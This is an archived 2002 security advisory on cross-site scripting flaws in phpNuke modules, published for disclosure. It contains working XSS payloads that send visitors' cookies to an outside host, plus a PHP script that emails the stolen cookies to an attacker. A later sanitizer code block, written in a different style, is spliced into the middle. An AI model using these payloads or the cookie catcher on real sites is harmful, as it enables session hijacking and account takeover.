[NEWS] Multiple phpNuke Modules Vulnerable to Cross-Site Scripting

From: support@securiteam.com
Date: 11/24/02

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 24 Nov 2002 22:23:56 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Multiple phpNuke Modules Vulnerable to Cross-Site Scripting
    ------------------------------------------------------------------------

    SUMMARY

    phpNuke is a popular and very complex content manager that runs on UNIX,
    Mac, and Windows systems with a MySQL or similar backend database. Many of
    the content manager's modules contain serious vulnerabilities that allow
    attackers to hijack or disable user accounts, and possibly gain
    administrative privileges. Gaining such privileges could likely assist
    further compromise of the susceptible system.

    DETAILS

    Vulnerable systems:
     * phpNuke 6.5b1 and prior

    I. Search Module Vulnerability

    The search module of phpNuke applies no filtering at all when returning
    the "Results for x..." page, and as a result is susceptible to cross-site
    scripting via a simple query such as:

    <SCR*IPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurphy@kc.rr.com&ref="+document.URL+"cookie="+document.cookie;

    II. Multiple Module Extended Tag Vulnerabilities

    phpNuke does a decent job of stripping known malicious tags, but doesn't
    take into account the fact that even "safe" tags can have malicious
    properties. This enables cross-site scripting against the PM module,
    Discussion module, News module, etc.; essentially any module that accepts
    user input for an article, message, or comment can be attacked with HTML
    such as:

    <B STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fetch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'cookie=\'+document.cookie'))">Bold text -- or an attack?</B>
    <B ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>
    <B ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Keep Away!</B>
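The mitigation the two sections above point at is the same in both cases: the reflected search term needs output encoding, and stored article/comment HTML needs an allowlist of tags with every attribute discarded, because a blacklist of "bad" tags never sees STYLE, ONCLICK or ONMOUSEOVER riding on a permitted <B>. The following is an added illustration, not phpNuke code or the advisory's script; the tag allowlist, the function names and the placeholder host are assumptions.

```php
<?php
// Added example (not phpNuke's code). Two fixes for the two contexts in the
// advisory: a reflected search term, and stored HTML in news/comments/PMs.

// Reflected context ("Results for x..."): never emit the query raw.
function escape_search_term(string $q): string {
    return htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Stored context: keep a few formatting tags, drop *every* attribute, and
// encode everything else. Stripping <script> alone leaves STYLE=expression(),
// ONCLICK and ONMOUSEOVER on otherwise "safe" tags untouched.
function sanitize_fragment(string $html): string {
    $allowed = ['b', 'i', 'u', 'p', 'br'];   // assumed allowlist
    $out = '';
    $offset = 0;
    // Any tag-like token; text between tokens is always encoded, so a token
    // the regex cannot parse (unterminated tag, '>' inside a quoted attribute)
    // fails safe and becomes literal text instead of markup.
    preg_match_all('/<\/?([a-zA-Z][a-zA-Z0-9]*)[^>]*>/', $html, $m, PREG_OFFSET_CAPTURE);
    foreach ($m[0] as $i => [$token, $pos]) {
        $out .= htmlspecialchars(substr($html, $offset, $pos - $offset), ENT_QUOTES, 'UTF-8');
        $name = strtolower($m[1][$i][0]);
        $closing = $token[1] === '/';
        if (in_array($name, $allowed, true)) {
            // Re-emit the bare tag name only: attributes are never copied.
            $out .= $closing ? "</$name>" : "<$name>";
        } else {
            // Unknown tag is rendered as text, not stripped silently.
            $out .= htmlspecialchars($token, ENT_QUOTES, 'UTF-8');
        }
        $offset = $pos + strlen($token);
    }
    $out .= htmlspecialchars(substr($html, $offset), ENT_QUOTES, 'UTF-8');
    return $out;
}

// Constructed samples in the shape of the advisory's payloads, placeholder host.
$comment = '<B ONMOUSEOVER="location.href=\'http://attacker.example/fetch.php?c=\'+document.cookie">Keep Away!</B>';
echo sanitize_fragment($comment), "\n";              // <b>Keep Away!</b>
$query = '<SCRIPT>location.href="http://attacker.example/"+document.cookie</SCRIPT>';
echo escape_search_term($query), "\n";               // all angle brackets and quotes encoded
```

A production sanitizer should be a maintained library with a real HTML parser; the regex tokenizer here is only meant to show why attribute stripping, not tag blacklisting, is the property that defeats these payloads.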

    Exploit Script
    <?php
    error_reporting(0);
    $redir_ref = TRUE;
    mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
    if ($redir_ref) {
        header("Location: ".urlencode($_GET["ref"]));
    }
    ?>

    Vendor Response:
    Matthew Murphy has contacted www.phpnuke.org through a private message,
    but if anyone knows a more reliable contact for them, please do use it, as
    this is not likely the only route of contact. Matthew Murphy sent a PM to
    "nukelite" with an example exploit in it. Matthew Murphy expects that
    future BETA releases will eliminate this vulnerability.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mattmurphy@kc.rr.com>
    Matthew Murphy.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.